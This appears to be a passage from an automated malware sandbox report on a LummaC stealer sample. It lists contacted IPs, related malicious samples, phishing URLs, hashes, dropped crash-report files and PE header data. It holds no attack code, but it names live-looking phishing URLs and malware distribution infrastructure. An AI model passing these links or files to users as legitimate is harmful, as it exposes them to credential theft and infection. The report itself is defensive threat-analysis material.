                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            CLOUDFLARENETUSPO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                                                            https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08okGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.18.142.119
                                                                                                                                                                                                                                            https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.18.26.193
                                                                                                                                                                                                                                            https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 172.66.0.235
                                                                                                                                                                                                                                            https://bit.ly/3W6tVJJ?BRK=80HiTWCpllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.66.0.227
                                                                                                                                                                                                                                            https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.26.9.117
                                                                                                                                                                                                                                            https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.26.9.117
                                                                                                                                                                                                                                            https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.26.9.117
                                                                                                                                                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                            AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 23.32.185.35
                                                                                                                                                                                                                                            DEMONS.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 96.25.164.130
                                                                                                                                                                                                                                            DEMONS.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.115.175.219
                                                                                                                                                                                                                                            ab_jGet hashmaliciousRust StealerBrowse
                                                                                                                                                                                                                                            • 23.67.65.229
                                                                                                                                                                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.72.144.32
                                                                                                                                                                                                                                            https://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                            • 104.102.43.106
                                                                                                                                                                                                                                            KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 96.17.237.158
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            UhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                                            Entropy (8bit):1.0192757841197153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:OMo37y9gwqvrPPf0PtkO0P3jRmmJIzuiFbZ24IO8TOB:xortrMPWO8jozuiFbY4IO8C
                                                                                                                                                                                                                                            MD5:C88537A5C3EB83DE43EA3FFB0BEAACB7
                                                                                                                                                                                                                                            SHA1:CA7E52ECF43DC3FE55A3CA41479228B51151587B
                                                                                                                                                                                                                                            SHA-256:0C824F912A4014AA2FD94149B1F140F4BFE6A2ABAE6F38C899F7FFBD665D51E0
                                                                                                                                                                                                                                            SHA-512:612CAFFA41192051D3CCDC8D27A77AC07B4594ABA811D2D6EC2AD7E24EEABBDC064330C10A220964E413F9081CB35C68EC5048EB528E322F396988557A8CCC99
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.1.9.0.0.8.9.6.8.5.0.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.1.9.0.0.9.4.9.9.7.5.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.4.3.4.1.b.8.-.e.8.e.1.-.4.f.b.e.-.9.c.c.d.-.d.8.0.1.2.e.d.d.1.1.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.6.2.e.d.c.3.-.7.f.a.f.-.4.2.7.c.-.9.e.3.6.-.9.9.5.4.4.5.8.6.7.8.b.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.d.0.-.0.0.0.1.-.0.0.1.4.-.4.3.e.c.-.c.3.d.6.4.a.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.c.8.a.6.d.f.e.9.7.d.3.3.a.d.a.8.6.c.6.5.2.9.8.a.d.9.1.a.b.4.6.e.d.d.c.8.4.5.4.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2.
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Jan 2 19:16:49 2025, 0x1205a4 type
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):53760
                                                                                                                                                                                                                                            Entropy (8bit):2.7195045139032845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:TVG3YqXKREmwl+HOtO1BBCqVhOZHCEILjtuqHQ9BBsmofyt7uHnxSA9nAZBdrq:hYKRERl+HVLBCfN9uAi0A9A7drq
                                                                                                                                                                                                                                            MD5:7D0707333FA82D65F9B4E1F544C06004
                                                                                                                                                                                                                                            SHA1:7E260EBC4C85948B193CB82310E354ACB0DB04DC
                                                                                                                                                                                                                                            SHA-256:C52F7C7C2E17439F4303C2D28330E6B9E26AB99A37AEFE2C881F526C611DA98F
                                                                                                                                                                                                                                            SHA-512:E540ECF30D180B0F8F5E9EADD16BD38AC29BC5981155BF40C297D1BB9C10746762AA9B581EBE80A8C564FBB3E5821291C6C36B08BD19951F2740CED66768B564
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:MDMP..a..... .......!.vg............4...............H............!...........6..........`.......8...........T...........8F.............."...........$..............................................................................eJ......x%......GenuineIntel............T.............vg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8282
                                                                                                                                                                                                                                            Entropy (8bit):3.688331787150665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJQCX6+t6W6YNZSUv3gmfBLfZSpDT89bGesf0xo3+Cm:R6lXJX6hW6YDSUv3gmfVVGdfAoC
                                                                                                                                                                                                                                            MD5:DDF1D33CA0C43F1FF0E694C6718B85EE
                                                                                                                                                                                                                                            SHA1:D7275F99DC44D020E520F06B9146DF4AEB6587B7
                                                                                                                                                                                                                                            SHA-256:562F4574290AD13D12AC431DEF2FB218A8C152A3C736484FBE15FE504534C520
                                                                                                                                                                                                                                            SHA-512:23B49E79F24728CE1829956FC356927037428102DCBCFC9411B57B4A85D34695CE8ED1DB6AB1D6E516FDDFC318D6683709A718FA20DE1BED9C401815C4483004
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.8.<./.P.i.
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4537
                                                                                                                                                                                                                                            Entropy (8bit):4.4247339132093195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI9c/WpW8VYzYm8M4JuUF5Z+q8FS/qSzgYd:uIjfBI76u7VDJVjySzgYd
                                                                                                                                                                                                                                            MD5:C92EBC3E6D5452FC14DF15D4A3CFD2AD
                                                                                                                                                                                                                                            SHA1:4455DE369ADB07B91A93B60F85450140C077935A
                                                                                                                                                                                                                                            SHA-256:B54713583588CE0F0204D4A76C42F77DD4F644D4100632C50C8278580946B173
                                                                                                                                                                                                                                            SHA-512:ACEBD7C94BC03C496A252195873A750468B35B80E376667231BC28829FE41408BD7B3E64E5A949BFF92D9D63E69343EA6471F2DD230F9578F176C77C9F66CFF1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658699" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                                            Entropy (8bit):4.416528826872322
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:mcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:Di58oSWIZBk2MM6AFBqo
                                                                                                                                                                                                                                            MD5:38BA31A6E75B803882E23449CB70D4A9
                                                                                                                                                                                                                                            SHA1:516A3BE36C312751A9B992921070555815162215
                                                                                                                                                                                                                                            SHA-256:5DECFE6B020E42C9E7F2022FA2C79C86C2BB994D1BB904EB72BC4F3E79FF39E6
                                                                                                                                                                                                                                            SHA-512:CE1B689C18B35911231EFB437255F6375BEB521D67C86CB759EBC30620455DD8A22900858C9A8F414C4463368176A76EB6BB78AC0DA68E0D0A9B38CF1217E9C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN...J]..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.309261993974339
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                                                            File size:317'952 bytes
                                                                                                                                                                                                                                            MD5:2ea329cf21fe95c260ea3b956b6fbb75
                                                                                                                                                                                                                                            SHA1:4c8a6dfe97d33ada86c65298ad91ab46eddc8454
                                                                                                                                                                                                                                            SHA256:36c05fed693856403b0e8aa36b032d350424ec12a657cb9a98f974f218db3884
                                                                                                                                                                                                                                            SHA512:9ba7c26d15f6a116489e69c364f51484fa028dc92cf76a15e7c49095707bc4d499e6da31e9c79e1c5d2b3047dcb0518e10fd01f163b9c6e71282fffb2e8eac90
                                                                                                                                                                                                                                            SSDEEP:6144:N0ytx8RRzYd1mH+CkaPSdpzybQiwRF/yCQaOn39cm4W8+:NpeRRzQ0BkFd40bbqC8Wms+
                                                                                                                                                                                                                                            TLSH:6264E022B952D472C98710304974DF61AB7EBD3216748A4737B8273E6FB02D2967A31B
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\UG..4)..4)..4)..f..24)..f..=4)..f...4).?.R..4)..4(.c4)..f...4)..f...4)..f...4).Rich.4).........................PE..L.....|f...
                                                                                                                                                                                                                                            Icon Hash:0f2b25ae9f5d3b1f
                                                                                                                                                                                                                                            Entrypoint:0x407176
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x667CE21A [Thu Jun 27 03:52:58 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:07893fd7e47cc055b130c321ac74f58f
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            call 00007F6675133126h
                                                                                                                                                                                                                                            jmp 00007F667512D13Dh
                                                                                                                                                                                                                                            call 00007F667512D2FCh
                                                                                                                                                                                                                                            xchg cl, ch
                                                                                                                                                                                                                                            jmp 00007F667512D2E4h
                                                                                                                                                                                                                                            call 00007F667512D2F3h
                                                                                                                                                                                                                                            fxch st(0), st(1)
                                                                                                                                                                                                                                            jmp 00007F667512D2DBh
                                                                                                                                                                                                                                            fabs
                                                                                                                                                                                                                                            fld1
                                                                                                                                                                                                                                            mov ch, cl
                                                                                                                                                                                                                                            xor cl, cl
                                                                                                                                                                                                                                            jmp 00007F667512D2D1h
                                                                                                                                                                                                                                            mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                                                                            fabs
                                                                                                                                                                                                                                            fxch st(0), st(1)
                                                                                                                                                                                                                                            fabs
                                                                                                                                                                                                                                            fxch st(0), st(1)
                                                                                                                                                                                                                                            fpatan
                                                                                                                                                                                                                                            or cl, cl
                                                                                                                                                                                                                                            je 00007F667512D2C6h
                                                                                                                                                                                                                                            fldpi
                                                                                                                                                                                                                                            fsubrp st(1), st(0)
                                                                                                                                                                                                                                            or ch, ch
                                                                                                                                                                                                                                            je 00007F667512D2C4h
                                                                                                                                                                                                                                            fchs
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            fabs
                                                                                                                                                                                                                                            fld st(0), st(0)
                                                                                                                                                                                                                                            fld st(0), st(0)
                                                                                                                                                                                                                                            fld1
                                                                                                                                                                                                                                            fsubrp st(1), st(0)
                                                                                                                                                                                                                                            fxch st(0), st(1)
                                                                                                                                                                                                                                            fld1
                                                                                                                                                                                                                                            faddp st(1), st(0)
                                                                                                                                                                                                                                            fmulp st(1), st(0)
                                                                                                                                                                                                                                            ftst
                                                                                                                                                                                                                                            wait
                                                                                                                                                                                                                                            fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                                                                            wait
                                                                                                                                                                                                                                            test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                                                                            jne 00007F667512D2C7h
                                                                                                                                                                                                                                            xor ch, ch
                                                                                                                                                                                                                                            fsqrt
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            pop eax
                                                                                                                                                                                                                                            jmp 00007F667512DADFh
                                                                                                                                                                                                                                            fstp st(0)
                                                                                                                                                                                                                                            fld tbyte ptr [004451FAh]
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            fstp st(0)
                                                                                                                                                                                                                                            or cl, cl
                                                                                                                                                                                                                                            je 00007F667512D2CDh
                                                                                                                                                                                                                                            fstp st(0)
                                                                                                                                                                                                                                            fldpi
                                                                                                                                                                                                                                            or ch, ch
                                                                                                                                                                                                                                            je 00007F667512D2C4h
                                                                                                                                                                                                                                            fchs
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            fstp st(0)
                                                                                                                                                                                                                                            fldz
                                                                                                                                                                                                                                            or ch, ch
                                                                                                                                                                                                                                            je 00007F667512D2B9h
                                                                                                                                                                                                                                            fchs
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            fstp st(0)
                                                                                                                                                                                                                                            jmp 00007F667512DAB5h
                                                                                                                                                                                                                                            fstp st(0)
                                                                                                                                                                                                                                            mov cl, ch
                                                                                                                                                                                                                                            jmp 00007F667512D2C2h
                                                                                                                                                                                                                                            call 00007F667512D28Eh
                                                                                                                                                                                                                                            jmp 00007F667512DAC0h
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                            add esp, FFFFFD30h
                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                            wait
                                                                                                                                                                                                                                            fstcw word ptr [ebp+0000005Ch]
                                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x438bc0x50.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x3f48.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x51000x40.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x190.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000x431fa0x43200c81f2290d046c92c18355eaa074f3433False0.8511915153631285data7.749741592856494IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0x450000xae080x64004644b60b956e90e212497308381007c0False0.0894921875dBase III DBT, next free block index 7565155, 1st item "\017\311\377?"1.0768447025033605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .rsrc0x500000x8f480x4000e320e917242708ba7c8eebf4e98b8accFalse0.49029541015625data4.688368188433047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_CURSOR0x533f80x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                                                                                                                                                                            RT_CURSOR0x537280x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
